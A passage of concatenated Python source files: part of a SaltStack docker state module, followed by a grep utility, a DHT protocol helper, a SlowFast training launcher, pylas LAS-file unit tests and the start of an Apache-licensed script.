if kill_signal:
killer = __salt__['docker.kill']
status = _ret_status(killer(container, signal=kill_signal),
name=name,
changes={name: True})
else:
restarter = __salt__['docker.restart']
status = _ret_status(restarter(container),
name=name,
changes={name: True})
return status
return {'name': name,
'changes': {},
'result': False,
'comment': ('watch requisite is not'
' implemented for {0}'.format(sfun))}
def pulled(name,
tag='latest',
force=False,
insecure_registry=False,
*args,
**kwargs):
'''
Pull an image from a docker registry. (`docker pull`)
.. note::
See first the documentation for `docker login`, `docker pull`,
`docker push`,
and `docker.import_image <https://github.com/dotcloud/docker-py#api>`_
(`docker import
<http://docs.docker.io/en/latest/reference/commandline/cli/#import>`_).
        Note that SaltStack also allows you to authenticate with the Docker
        Hub Registry by supplying your credentials (username, email and
        password) using pillars. For more information, see the
        salt.modules.dockerio execution module.
name
Name of the image
tag
Tag of the image
force
Pull even if the image is already pulled
insecure_registry
Set to ``True`` to allow connections to non-HTTPS registries. Default ``False``.
'''
inspect_image = __salt__['docker.inspect_image']
image_name = _get_image_name(name, tag)
image_infos = inspect_image(image_name)
if image_infos['status'] and not force:
return _valid(
name=name,
comment='Image already pulled: {0}'.format(image_name))
if __opts__['test']:
comment = 'Image {0} will be pulled'.format(image_name)
return _ret_status(name=name, comment=comment)
previous_id = image_infos['out']['Id'] if image_infos['status'] else None
pull = __salt__['docker.pull']
returned = pull(name, tag=tag, insecure_registry=insecure_registry)
if previous_id != returned['id']:
changes = {name: {'old': previous_id,
'new': returned['id']}}
comment = 'Image {0} pulled'.format(image_name)
else:
changes = {}
comment = ''
return _ret_status(returned, name, changes=changes, comment=comment)
def pushed(name, tag='latest', insecure_registry=False):
'''
    Push an image to a docker registry. (`docker push`)
.. note::
See first the documentation for `docker login`, `docker pull`,
`docker push`,
and `docker.import_image <https://github.com/dotcloud/docker-py#api>`_
(`docker import
<http://docs.docker.io/en/latest/reference/commandline/cli/#import>`_).
        Note that SaltStack also allows you to authenticate with the Docker
        Hub Registry by supplying your credentials (username, email and
        password) using pillars. For more information, see the
        salt.modules.dockerio execution module.
name
Name of the image
tag
Tag of the image [Optional]
insecure_registry
Set to ``True`` to allow connections to non-HTTPS registries. Default ``False``.
'''
image_name = _get_image_name(name, tag)
if __opts__['test']:
comment = 'Image {0} will be pushed'.format(image_name)
return _ret_status(name=name, comment=comment)
push = __salt__['docker.push']
returned = push(name, tag=tag, insecure_registry=insecure_registry)
log.debug("Returned: "+str(returned))
if returned['status']:
changes = {name: {'Rev': returned['id']}}
else:
changes = {}
return _ret_status(returned, name, changes=changes)
def loaded(name, tag='latest', source=None, source_hash='', force=False):
'''
Load an image into the local docker registry (`docker load`)
name
Name of the docker image
tag
tag of the image (defaults to 'latest')
source
The source .tar file to download to the minion, created by docker save
this source file can be hosted on either the salt master server,
or on an HTTP or FTP server.
        If the file is hosted on an HTTP or FTP server, then the source_hash
argument is also required
.. note::
See first the documentation for Salt `file.managed
<http://docs.saltstack.com/en/latest/ref/states/all/salt.states.file.html#salt.states.file.managed>`_
source_hash
This can be one of the following:
1. a source hash string
2. the URI of a file that contains source hash strings
force
Load even if the image exists
'''
inspect_image = __salt__['docker.inspect_image']
image_name = _get_image_name(name, tag)
image_infos = inspect_image(image_name)
if image_infos['status'] and not force:
return _valid(
name=name,
comment='Image already loaded: {0}'.format(image_name))
if __opts__['test']:
comment = 'Image {0} will be loaded'.format(image_name)
return _ret_status(name=name, comment=comment)
tmp_filename = salt.utils.mkstemp()
__salt__['state.single']('file.managed',
name=tmp_filename,
source=source,
source_hash=source_hash)
changes = {}
if image_infos['status']:
changes['old'] = image_infos['out']['Id']
remove_image = __salt__['docker.remove_image']
remove_info = remove_image(image_name)
if not remove_info['status']:
return _invalid(name=name,
comment='Image could not be removed: {0}'.format(name))
load = __salt__['docker.load']
returned = load(tmp_filename)
image_infos = inspect_image(image_name)
if image_infos['status']:
changes['new'] = image_infos['out']['Id']
else:
return _invalid(
name=name,
comment='Image {0} was not loaded into docker'.format(image_name))
return _ret_status(returned, name, changes=changes)
def built(name,
tag='latest',
path=None,
quiet=False,
nocache=False,
rm=True,
force=False,
timeout=None,
*args, **kwargs):
'''
Build a docker image from a path or URL to a dockerfile. (`docker build`)
name
Name of the image
tag
tag of the image (defaults to 'latest')
path
URL (e.g. `url/branch/docker_dir/dockerfile`)
or filesystem path to the dockerfile
'''
inspect_image = __salt__['docker.inspect_image']
image_name = _get_image_name(name, tag)
image_infos = inspect_image(image_name)
if image_infos['status'] and not force:
return _valid(
name=name,
comment='Image already built: {0}, id: {1}'.format(
image_name, image_infos['out']['Id']))
if __opts__['test']:
comment = 'Image {0} will be built'.format(image_name)
return {'name': name,
'changes': {},
'result': None,
'comment': comment}
previous_id = image_infos['out']['Id'] if image_infos['status'] else None
build = __salt__['docker.build']
kw = dict(tag=image_name,
path=path,
quiet=quiet,
nocache=nocache,
rm=rm,
timeout=timeout,
)
returned = build(**kw)
if previous_id != returned['id']:
changes = {name: {'old': previous_id,
'new': returned['id']}}
comment = 'Image {0} built'.format(image_name)
else:
changes = {}
comment = ''
return _ret_status(exec_status=returned,
name=name,
changes=changes,
comment=comment)
def installed(name,
image,
tag='latest',
command=None,
hostname=None,
user=None,
detach=True,
stdin_open=False,
tty=False,
mem_limit=None,
ports=None,
environment=None,
dns=None,
volumes=None,
volumes_from=None,
cpu_shares=None,
cpuset=None,
*args, **kwargs):
'''
Ensure that a container with the given name exists;
if not, build a new container from the specified image.
(`docker run`)
name
Name for the container
image
Image from which to build this container
tag
tag of the image (defaults to 'latest')
environment
Environment variables for the container, either
- a mapping of key, values
- a list of mappings of key, values
ports
List of ports definitions, either:
- a port to map
- a mapping of mapping portInHost : PortInContainer
volumes
List of volumes (see notes for the running function)
    For other parameters, see first the salt.modules.dockerio
execution module and the `docker-py python bindings for docker
documentation <https://github.com/dotcloud/docker-py#api>`_ for
`docker.create_container`.
.. note::
This command does not verify that the named container
is running the specified image.
'''
ins_image = __salt__['docker.inspect_image']
ins_container = __salt__['docker.inspect_container']
create = __salt__['docker.create_container']
image_name = _get_image_name(image, tag)
iinfos = ins_image(image_name)
if not iinfos['status']:
return _invalid(comment='Image "{0}" does not exist'.format(image_name))
cinfos = ins_container(name)
already_exists = cinfos['status']
    # if the container already exists, we consider it installed
if already_exists:
return _valid(comment='Container {0!r} already exists'.format(name))
dports, denvironment = {}, {}
if __opts__['test']:
comment = 'Container {0!r} will be created'.format(name)
return _ret_status(name=name, comment=comment)
if not ports:
ports = []
if not volumes:
volumes = []
if isinstance(environment, dict):
for k in environment:
denvironment[six.text_type(k)] = six.text_type(environment[k])
if isinstance(environment, list):
for p in environment:
if isinstance(p, dict):
for k in p:
denvironment[six.text_type(k)] = six.text_type(p[k])
for p in ports:
if not isinstance(p, dict):
dports[str(p)] = {}
else:
for k in p:
                dports[str(k)] = {}
parsed_volumes = _parse_volumes(volumes)
bindvolumes = parsed_volumes['bindvols']
contvolumes = parsed_volumes['contvols']
kw = dict(
binds=bindvolumes,
command=command,
hostname=hostname,
user=user,
detach=detach,
stdin_open=stdin_open,
tty=tty,
mem_limit=mem_limit,
ports=dports,
environment=denvironment,
dns=dns,
volumes=contvolumes,
volumes_from=volumes_from,
name=name,
cpu_shares=cpu_shares,
cpuset=cpuset)
out = create(image_name, **kw)
# if container has been created, even if not started, we mark
# it as installed
changes = 'Container created'
try:
cid = out['out']['info']['id']
except Exception as e:
log.debug(str(e))
else:
changes = 'Container {0} created'.format(cid)
out['comment'] = changes
ret = _ret_status(out, name, changes=changes)
return ret
def absent(name):
'''
    Ensure that the container is absent; if not, it will
    be killed and destroyed. (`docker inspect`)
name:
Either the container name or id
'''
ins_container = __salt__['docker.inspect_container']
cinfos = ins_container(name)
changes = {}
if cinfos['status']:
cid = cinfos['id']
changes[cid] = {}
is_running = __salt__['docker.is_running'](cid)
if __opts__['test']:
comment = 'Container {0!r} will be stopped and destroyed'.format(cid)
return _ret_status(name=name, comment=comment)
# Stop container gracefully, if running
if is_running:
changes[cid]['old'] = 'running'
__salt__['docker.stop'](cid)
is_running = __salt__['docker.is_running'](cid)
if is_running:
return _invalid(comment=("Container {0!r} could not be stopped"
.format(cid)))
else:
__salt__['docker.remove_container'](cid)
is_gone = __salt__['docker.exists'](cid)
if is_gone:
return _valid(comment=('Container {0!r}'
' was stopped and destroyed, '.format(cid)),
changes={name: True})
else:
return _valid(comment=('Container {0!r}'
' was stopped but could not be destroyed,'.format(cid)),
changes={name: True})
else:
__salt__['docker.remove_container'](cid)
is_gone = __salt__['docker.exists'](cid)
if is_gone:
return _valid(comment=('Container {0!r}'
                                   ' is stopped and was destroyed'.format(cid)),
changes={name: True})
else:
return _valid(comment=('Container {0!r}'
' is stopped but could not be destroyed,'.format(cid)),
changes={name: True})
else:
return _valid(comment="Container {0!r} not found".format(name))
def present(name, image=None, tag='latest', is_latest=False):
'''
If a container with the given name is not present, this state will fail.
Supports optionally checking for specific image/tag
(`docker inspect`)
name:
container id
image:
image the container should be running (defaults to any)
tag:
tag of the image (defaults to 'latest')
is_latest:
also check if the container runs the latest version of the image (
latest defined as the latest pulled onto the local machine)
'''
ins_container = __salt__['docker.inspect_container']
cinfos = ins_container(name)
if 'id' in cinfos:
cid = cinfos['id']
else:
cid = name
if not cinfos['status']:
return _invalid(comment='Container {0} not found'.format(cid or name))
if cinfos['status'] and image is None:
return _valid(comment='Container {0} exists'.format(cid))
image_name = _get_image_name(image, tag)
if cinfos['status'] and cinfos['out']['Config']["Image"] == image_name and not is_latest:
return _valid(comment='Container {0} exists and has image {1}'.format(cid, image_name))
ins_image = __salt__['docker.inspect_image']
iinfos = ins_image(image_name)
if cinfos['status'] and cinfos['out']['Image'] == iinfos['out']['Id']:
return _valid(comment='Container {0} exists and has latest version of image {1}'.format(cid, image_name))
return _invalid(comment='Container {0} found with wrong image'.format(cid or name))
def run(name,
cid=None,
hostname=None,
onlyif=None,
unless=None,
docked_onlyif=None,
docked_unless=None,
*args, **kwargs):
'''
Run a command in a specific container
You can match by either name or hostname
name
command to run in the container
cid
Container id or name
state_id
state_id
onlyif
Only execute cmd if statement on the host returns 0
unless
Do not execute cmd if statement on the host returns 0
docked_onlyif
Only execute cmd if statement in the container returns 0
docked_unless
Do not execute cmd if statement in the container returns 0
'''
if hostname:
salt.utils.warn_until(
'Helium',
'The \'hostname\' argument has been deprecated.'
)
retcode = __salt__['docker.retcode']
drun_all = __salt__['docker.run_all']
valid = functools.partial(_valid, name=name)
if onlyif is not None:
if not isinstance(onlyif, string_types):
if not onlyif:
return valid(comment='onlyif execution failed')
elif isinstance(onlyif, string_types):
if not __salt__['cmd.retcode'](onlyif) == 0:
return valid(comment='onlyif execution failed')
if unless is not None:
if not isinstance(unless, string_types):
if unless:
return valid(comment='unless execution succeeded')
elif isinstance(unless, string_types):
if __salt__['cmd.retcode'](unless) == 0:
return valid(comment='unless execution succeeded')
if docked_onlyif is not None:
if not isinstance(docked_onlyif, string_types):
if not docked_onlyif:
return valid(comment='docked_onlyif execution failed')
elif isinstance(docked_onlyif, string_types):
if not retcode(cid, docked_onlyif):
return valid(comment='docked_onlyif execution failed')
if docked_unless is not None:
if not isinstance(docked_unless, string_types):
if docked_unless:
return valid(comment='docked_unless execution succeeded')
elif isinstance(docked_unless, string_types):
if retcode(cid, docked_unless):
return valid(comment='docked_unless execution succeeded')
if __opts__['test']:
comment = 'Command {0!r} will be executed on container {1}'.format(name, cid)
return _ret_status(name=name, comment=comment)
result = drun_all(cid, name)
if result['status']:
return valid(comment=result['comment'])
else:
return _invalid(comment=result['comment'], name=name)
def script(*args, **kw):
'''
    Placeholder for a cmd.script-like function.
    .. note::
        Not yet implemented.
        Its implementation might be very similar to
        :mod:`salt.states.dockerio.run`
'''
raise NotImplementedError
def running(name,
image,
tag='latest',
container=None,
command=None,
hostname=None,
user=None,
detach=True,
stdin_open=False,
tty=False,
mem_limit=None,
ports=None,
environment=None,
dns=None,
volumes=None,
volumes_from=None,
start=True,
cap_add=None,
cap_drop=None,
privileged=None,
lxc_conf=None,
network_mode=None,
check_is_running=True,
publish_all_ports=False,
links=None,
restart_policy=None,
cpu_shares=None,
cpuset=None,
kill_signal=None,
*args, **kwargs):
'''
Ensure that a container is running. If the container does not exist, it
will be created from the specified image. (`docker run`)
name / container
Name for the container
image
Image from which to build this container
tag
tag of the image (defaults to 'latest')
environment
Environment variables for the container, either
- a mapping of key, values
- a list of mappings of key, values
ports
List of ports definitions, either:
- a port to map
- a mapping of mapping portInHost : PortInContainer
.. code-block:: yaml
- ports:
- "5000/tcp":
HostIp: ""
HostPort: "5000"
publish_all_ports
Publish all ports from the port list (default is false,
only meaningful if port does not contain portinhost:portincontainer mapping)
volumes
List of volumes to mount or create in the container (like ``-v`` of ``docker run`` command),
mapping host directory to container directory.
To specify a volume in the container in terse list format:
.. code-block:: yaml
- volumes:
- "/var/log/service" # container-only volume
- "/srv/timezone:/etc/timezone" # bound volume
- "/usr/local/etc/passwd:/etc/passwd:ro" # read-only bound volume
You can also use the short dictionary form (note that the notion of
source:target from docker is preserved):
.. code-block:: yaml
- volumes:
- /var/log/service: /var/log/service # mandatory read-write implied
Or, alternatively, to specify read-only mounting, use the extended form:
.. code-block:: yaml
- volumes:
- /home/user1:
bind: /mnt/vol2
ro: True
- /var/www:
bind: /mnt/vol1
ro: False
Or (for backwards compatibility) another dict style:
.. code-block:: yaml
- volumes:
/home/user1:
bind: /mnt/vol2
ro: True
/var/www:
bind: /mnt/vol1
ro: False
volumes_from
List of containers to share volumes with
dns
List of DNS servers.
.. code-block:: yaml
- dns:
- 127.0.0.1
network_mode
- 'bridge': creates a new network stack for the container on the docker bridge
- 'none': no networking for this container
        - 'container:[name|id]': reuses another container's network stack
- 'host': use the host network stack inside the container
.. code-block:: yaml
- network_mode: host
restart_policy
Restart policy to apply when a container exits (no, on-failure[:max-retry], always)
.. code-block:: yaml
- restart_policy:
MaximumRetryCount: 5
Name: on-failure
cap_add
List of capabilities to add in a container.
cap_drop
List of capabilities to drop in a container.
check_is_running
Enable checking if a container should run or not.
Useful for data-only containers that must be linked to another one.
e.g. nginx <- static-files
cpu_shares
CPU shares (relative weight)
.. code-block:: yaml
- cpu_shares: 2
cpuset
CPUs in which to allow execution ('0-3' or '0,1')
.. code-block:: yaml
- cpuset: '0-3'
kill_signal
If defined, its value will be sent as a kill signal to the running
container. i.e. It will use client.kill(signal=kill_signal)
instead of client.restart(), when the state is triggered by a watcher
requisite.
possible use case: Soft reload of nginx
.. code-block:: yaml
nginx:
docker.running:
- image: some-fictional-registry.com/nginx
- tag: latest
- kill_signal: SIGHUP
- watch:
- file: /etc/nginx/nginx.conf
This state will ask nginx to reload (instead of restart)
each time the /etc/nginx/nginx.conf is modified.
.. versionadded:: 2015.8.0
    For other parameters, see the salt.modules.dockerio execution module
    and the `docker-py python bindings for docker documentation
    <https://github.com/dotcloud/docker-py#api>`_ for
    `docker.create_container`.
.. note::
This command does not verify that the named container
is running the specified image.
'''
if container is None:
container = name
ins_image = __salt__['docker.inspect_image']
ins_container = __salt__['docker.inspect_container']
create = __salt__['docker.create_container']
image_name = _get_image_name(image, tag)
iinfos = ins_image(image_name)
image_exists = iinfos['status']
if not image_exists:
        return _invalid(comment='Image "{0}" does not exist'.format(image_name))
cinfos = ins_container(name)
already_exists = cinfos['status']
already_exists_with_same_image = (
# if container is known by name,
already_exists
# and the container is based on expected image,
and cinfos['out']['Image'] == iinfos['out']['Id']
# then assume it already exists.
)
is_running = __salt__['docker.is_running'](container)
# if container exists but is not started, try to start it
if already_exists_with_same_image and (is_running or not start):
return _valid(comment='container {0!r} already exists'.format(name))
if not already_exists_with_same_image and already_exists:
        # Outdated container: it is running against an old image.
        # We have to stop and remove the old container to free up
        # the name for the new one.
if __opts__['test']:
comment = 'Will replace outdated container {0!r}'.format(name)
return _ret_status(name=name, comment=comment)
if is_running:
stop_status = __salt__['docker.stop'](name)
if not stop_status['status']:
return _invalid(comment='Failed to stop outdated container {0!r}'.format(name))
remove_status = __salt__['docker.remove_container'](name)
if not remove_status['status']:
return _invalid(comment='Failed to remove outdated container {0!r}'.format(name))
already_exists = False
# now it's clear, the name is available for the new container
if __opts__['test']:
comment = 'Will create container {0!r}'.format(name)
return _ret_status(name=name, comment=comment)
# parse input data
exposeports, bindports, contvolumes, bindvolumes, denvironment, changes = [], {}, [], {}, {}, []
if not ports:
ports = {}
if not volumes:
volumes = {}
if not volumes_from:
volumes_from = []
if isinstance(environment, dict):
for key in environment:
denvironment[six.text_type(key)] = six.text_type(environment[key])
if isinstance(environment, list):
for var in environment:
if isinstance(var, dict):
for key in var:
denvironment[six.text_type(key)] = six.text_type(var[key])
if isinstance(volumes, dict):
bindvolumes = volumes
if isinstance(volumes, list):
for vol in volumes:
if isinstance(vol, dict):
# get source as the dict key
source = list(vol.keys())[0]
# then find target
if isinstance(vol[source], dict):
target = vol[source]['bind']
read_only = vol[source].get('ro', False)
else:
target = str(vol[source])
read_only = False
bindvolumes[source] = {'bind': target,
'ro': read_only
}
else:
                # assume a container-only volume
contvolumes.append(str(vol))
if isinstance(ports, dict):
bindports = ports
# in dict form all ports bind, so no need for exposeports
if isinstance(ports, list):
for port in ports:
if isinstance(port, dict):
container_port = list(port.keys())[0]
# find target
if isinstance(port[container_port], dict):
host_port = port[container_port]['HostPort']
host_ip = port[container_port].get('HostIp', '0.0.0.0')
else:
host_port = str(port[container_port])
host_ip = '0.0.0.0'
bindports[container_port] = {
'HostPort': host_port,
'HostIp': host_ip
}
else:
# assume just a port to expose
exposeports.append(str(port))
parsed_volumes = _parse_volumes(volumes)
bindvolumes = parsed_volumes['bindvols']
contvolumes = parsed_volumes['contvols']
if not already_exists:
kwargs = dict(command=command,
hostname=hostname,
user=user,
detach=detach,
stdin_open=stdin_open,
tty=tty,
mem_limit=mem_limit,
ports=exposeports,
environment=denvironment,
dns=dns,
binds=bindvolumes,
volumes=contvolumes,
name=name,
cpu_shares=cpu_shares,
cpuset=cpuset)
out = create(image_name, **kwargs)
# if container has been created, even if not started, we mark
# it as installed
try:
cid = out['out']['info']['id']
log.debug(str(cid))
except Exception as e:
changes.append('Container created')
log.debug(str(e))
else:
changes.append('Container {0} created'.format(cid))
if start:
started = __salt__['docker.start'](name,
binds=bindvolumes,
port_bindings=bindports,
lxc_conf=lxc_conf,
publish_all_ports=publish_all_ports,
links=links,
privileged=privileged,
dns=dns,
volumes_from=volumes_from,
network_mode=network_mode,
restart_policy=restart_policy,
cap_add=cap_add,
cap_drop=cap_drop)
if check_is_running:
is_running = __salt__['docker.is_running'](name)
log.debug("Docker-io running:" + str(started))
log.debug("Docker-io running:" + str(is_running))
if is_running:
changes.append('Container {0!r} started.\n'.format(name))
else:
return _invalid(comment=('Container {0!r} cannot be started\n{1!s}'
.format(name, started['out'],)))
else:
changes.append('Container {0!r} started.\n'.format(name))
return _valid(comment='\n'.join(changes), changes={name: True})
|
py | 7dfa064d34a5d21bc201ac2f265e81bffc81b71d | #!/usr/bin/env python
__author__ = "bt3"
import sys
def grep_word_from_files():
''' using iterator enumerate to create a grep command '''
word = sys.argv[1]
for filename in sys.argv[2:]:
with open(filename) as file:
for lino, line in enumerate(file, start=1):
if word in line:
print("{0}:{1}:{2:.40}".format(filename, lino, line.rstrip()))
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: grep_word_from_files.py word infile1 [infile2...]")
sys.exit()
else:
grep_word_from_files()
|
py | 7dfa09a2622fd8cef0e6c902a11e115364038d86 | import socket
import struct
from TorrentPython.Bencode import *
class DHTProtocol(object):
COMPACT_NODE_INFO_LENGTH = 26 # byte
@staticmethod
def get_ping(client_id: bytes):
return Bencode.encode(
{b't': b'aa', b'y': b'q', b'q': b'ping', b'a': {b'id': client_id}})
@staticmethod
def get_peers(client_id: bytes, info_hash: bytes):
if len(info_hash) is not 20:
return None
return Bencode.encode(
{b't': b'aa', b'y': b'q', b'q': b'get_peers', b'a': {b'id': client_id, b'info_hash': info_hash}})
@staticmethod
def is_response(response: dict):
return b'r' in response
@staticmethod
def parse_peers(response: dict):
peers = []
nodes = {}
if not DHTProtocol.is_response(response):
return peers, nodes
source = response.get(b'r').get(b'values')
if source:
for sample in source:
peers.append((socket.inet_ntoa(sample[:4]), struct.unpack('!H', sample[4:4 + 2])[0]))
source = response.get(b'r').get(b'nodes')
if source:
for idx in range(0, len(source), DHTProtocol.COMPACT_NODE_INFO_LENGTH):
sample = source[idx:idx + DHTProtocol.COMPACT_NODE_INFO_LENGTH]
nodes[sample[:20]] = (socket.inet_ntoa(sample[20:20 + 4]), struct.unpack('!H', sample[24:24 + 2])[0])
return peers, nodes
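# --- Illustrative usage sketch (not part of the original module) ---
# Shows how the helpers above are typically combined: build a KRPC ping,
# send it over UDP to a bootstrap node, decode the bencoded reply and run
# it through parse_peers(). Assumptions: the bootstrap address below is a
# placeholder, get_ping() returns bytes ready to send, and Bencode.decode()
# exists as the counterpart of Bencode.encode(); adjust for real use.
if __name__ == '__main__':
    import os
    client_id = os.urandom(20)  # random 20-byte node id for this session
    query = DHTProtocol.get_ping(client_id)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5.0)
    try:
        sock.sendto(query, ('router.bittorrent.com', 6881))  # placeholder node
        data, _addr = sock.recvfrom(65536)
        response = Bencode.decode(data)  # assumed API, mirrors Bencode.encode
        if DHTProtocol.is_response(response):
            peers, nodes = DHTProtocol.parse_peers(response)
            print('peers:', peers, 'nodes:', len(nodes))
    except socket.timeout:
        print('no response from bootstrap node')
    finally:
        sock.close()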
|
py | 7dfa0a3d4ac94c7f4f0d832003d071aeb1bb865f | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
"""Wrapper to train and test a video classification model."""
import argparse
import sys
import torch
import slowfast.utils.checkpoint as cu
import slowfast.utils.multiprocessing as mpu
from slowfast.config.defaults import get_cfg
from test_net import test
from train_net import train
def parse_args():
"""
Parse the following arguments for the video training and testing pipeline.
Args:
        shard_id (int): shard id for the current machine, ranging from 0 to
            num_shards - 1. If a single machine is used, set shard_id to 0.
        num_shards (int): number of shards used by the job.
        init_method (str): initialization method to launch the job with multiple
            devices. Options include TCP or shared file-system for
            initialization. Details can be found in
            https://pytorch.org/docs/stable/distributed.html#tcp-initialization
        cfg (str): path to the config file.
        opts (argument): provides additional options from the command line;
            these overwrite the config loaded from the file.
"""
parser = argparse.ArgumentParser(
description="Provide SlowFast video training and testing pipeline."
)
parser.add_argument(
"--shard_id",
        help="The shard id of the current node; starts from 0 to num_shards - 1",
default=0,
type=int,
)
parser.add_argument(
"--num_shards",
        help="Number of shards used by the job",
default=1,
type=int,
)
parser.add_argument(
"--init_method",
help="Initialization method, includes TCP or shared file-system",
default="tcp://localhost:9999",
type=str,
)
# 'configs/VidOR/I3D_8x8_R50.yaml'
# 'configs/VidOR/SLOWFAST_8x8_R50.yaml'
parser.add_argument(
"--cfg",
dest="cfg_file",
help="Path to the config file",
default='configs/VidOR/SLOWFAST_8x8_R50.yaml',
type=str,
)
parser.add_argument(
"opts",
help="See slowfast/config/defaults.py for all options",
default=None,
nargs=argparse.REMAINDER,
)
if len(sys.argv) == 1:
parser.print_help()
return parser.parse_args()
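# Illustrative invocations (not part of the original file; the script name is a
# placeholder). Positional `opts` entries are forwarded to cfg.merge_from_list()
# below, so KEY VALUE pairs appended after the flags override the YAML config:
#   python run_net.py --cfg configs/VidOR/SLOWFAST_8x8_R50.yaml
#   python run_net.py --cfg configs/VidOR/SLOWFAST_8x8_R50.yaml NUM_GPUS 1 TRAIN.ENABLE False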
def load_config(args):
"""
    Given the arguments, load and initialize the configs.
    Args:
        args (argument): arguments include `shard_id`, `num_shards`,
            `init_method`, `cfg_file`, and `opts`.
"""
# Setup cfg.
cfg = get_cfg()
# Load config from cfg.
if args.cfg_file is not None:
cfg.merge_from_file(args.cfg_file)
# Load config from command line, overwrite config from opts.
if args.opts is not None:
cfg.merge_from_list(args.opts)
# Inherit parameters from args.
if hasattr(args, "num_shards") and hasattr(args, "shard_id"):
cfg.NUM_SHARDS = args.num_shards
cfg.SHARD_ID = args.shard_id
if hasattr(args, "rng_seed"):
cfg.RNG_SEED = args.rng_seed
if hasattr(args, "output_dir"):
cfg.OUTPUT_DIR = args.output_dir
# Create the checkpoint dir.
cu.make_checkpoint_dir(cfg.OUTPUT_DIR)
return cfg
def main():
"""
Main function to spawn the train and test process.
"""
args = parse_args()
cfg = load_config(args)
# Perform training.
if cfg.TRAIN.ENABLE:
if cfg.NUM_GPUS > 1:
torch.multiprocessing.spawn(
mpu.run,
nprocs=cfg.NUM_GPUS,
args=(
cfg.NUM_GPUS,
train,
args.init_method,
cfg.SHARD_ID,
cfg.NUM_SHARDS,
cfg.DIST_BACKEND,
cfg,
),
daemon=False,
)
else:
train(cfg=cfg)
# Perform multi-clip testing.
if cfg.TEST.ENABLE:
if cfg.NUM_GPUS > 1:
torch.multiprocessing.spawn(
mpu.run,
nprocs=cfg.NUM_GPUS,
args=(
cfg.NUM_GPUS,
test,
args.init_method,
cfg.SHARD_ID,
cfg.NUM_SHARDS,
cfg.DIST_BACKEND,
cfg,
),
daemon=False,
)
else:
test(cfg=cfg)
if __name__ == "__main__":
torch.multiprocessing.set_start_method("forkserver")
main()
|
py | 7dfa0a7a0265e9df951d9eb4b42fa0225344423e | import io
import numpy as np
import pytest
import pylas
from pylas import PointFormat
from pylastests.test_common import write_then_read_again, simple_las, test1_4_las
@pytest.fixture()
def file1_4():
return pylas.read(test1_4_las)
@pytest.fixture()
def file():
return pylas.read(simple_las)
def test_xyz():
las = pylas.create()
shape = (150,)
las.X = np.zeros(shape, dtype=np.int32)
las.Y = np.ones(shape, dtype=np.int32)
las.Z = np.zeros(shape, dtype=np.int32)
las.Z[:] = -152
las = write_then_read_again(las)
assert np.alltrue(las.X == 0)
assert np.alltrue(las.Y == 1)
assert np.alltrue(las.Z == -152)
def test_wrong_version():
for i in range(6, 8):
with pytest.raises(pylas.errors.PylasError):
_ = pylas.create(point_format=i, file_version="1.2")
def test_good_version_is_used():
for i in range(6, 8):
las = pylas.create(point_format=i)
assert las.header.version.major == 1
assert las.header.version.minor == 4
def test_create_fmt_0():
new = pylas.create(point_format=0)
with pytest.raises(ValueError):
new.red = np.zeros(len(new.points), np.uint16)
    with pytest.raises(ValueError):
        new.green = np.zeros(len(new.points), np.uint16)
    with pytest.raises(ValueError):
        new.blue = np.zeros(len(new.points), np.uint16)
with pytest.raises(ValueError):
new.gps_time = np.zeros(len(new.points), np.float64)
def test_create_fmt_1():
new = pylas.create(point_format=1)
with pytest.raises(ValueError):
new.red = np.zeros(len(new.points), np.uint16)
    with pytest.raises(ValueError):
        new.green = np.zeros(len(new.points), np.uint16)
    with pytest.raises(ValueError):
        new.blue = np.zeros(len(new.points), np.uint16)
gps_time = np.random.uniform(0, 25641, len(new.points))
new.gps_time = gps_time
assert np.allclose(new.gps_time, gps_time)
new = write_then_read_again(new)
assert np.allclose(new.gps_time, gps_time)
def test_create_fmt_2(file):
new = pylas.create(point_format=2)
with pytest.raises(ValueError):
new.gps_time = file.gps_time
new.red = file.red
new.green = file.green
new.blue = file.blue
assert np.allclose(new.red, file.red)
assert np.allclose(new.green, file.green)
assert np.allclose(new.blue, file.blue)
new = write_then_read_again(new)
assert np.allclose(new.red, file.red)
assert np.allclose(new.green, file.green)
assert np.allclose(new.blue, file.blue)
def test_create_fmt_3(file):
new = pylas.create(point_format=3)
new.red = file.red
new.green = file.green
new.blue = file.blue
new.gps_time = file.gps_time
assert np.allclose(new.red, file.red)
assert np.allclose(new.green, file.green)
assert np.allclose(new.blue, file.blue)
assert np.allclose(new.gps_time, file.gps_time)
new = write_then_read_again(new)
assert np.allclose(new.red, file.red)
assert np.allclose(new.green, file.green)
assert np.allclose(new.blue, file.blue)
assert np.allclose(new.gps_time, file.gps_time)
def test_create_fmt_6(file1_4):
new = pylas.create(point_format=6)
assert str(new.header.version) == "1.4"
dim_names_fmt_6 = PointFormat(6).dtype().names
for dim_name in dim_names_fmt_6:
new[dim_name] = file1_4[dim_name]
for dim_name in dim_names_fmt_6:
assert np.allclose(new[dim_name], file1_4[dim_name]), "{} not equal".format(
dim_name
)
new = write_then_read_again(new)
for dim_name in dim_names_fmt_6:
assert np.allclose(new[dim_name], file1_4[dim_name]), "{} not equal".format(
dim_name
)
@pytest.mark.parametrize("laz_backend", (None,) + pylas.LazBackend.detect_available())
def test_writing_empty_file(laz_backend):
las = pylas.create()
with io.BytesIO() as out:
if laz_backend is None:
las.write(out)
else:
las.write(out, laz_backend=laz_backend)
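# --- Illustrative sketch (not part of the original test module) ---
# Summarizes the pattern the tests above rely on: create a LAS in memory, set
# raw integer coordinates, then round-trip it through the write_then_read_again()
# helper imported from test_common. The leading underscore keeps pytest from
# collecting it as a test.
def _example_roundtrip():
    las = pylas.create(point_format=0)
    las.X = np.arange(10, dtype=np.int32)
    las.Y = np.zeros(10, dtype=np.int32)
    las.Z = np.full(10, -5, dtype=np.int32)
    las = write_then_read_again(las)
    assert np.alltrue(las.X == np.arange(10))
    return las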
|
py | 7dfa0b90ce1f6624823373f93d9226e0de139073 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
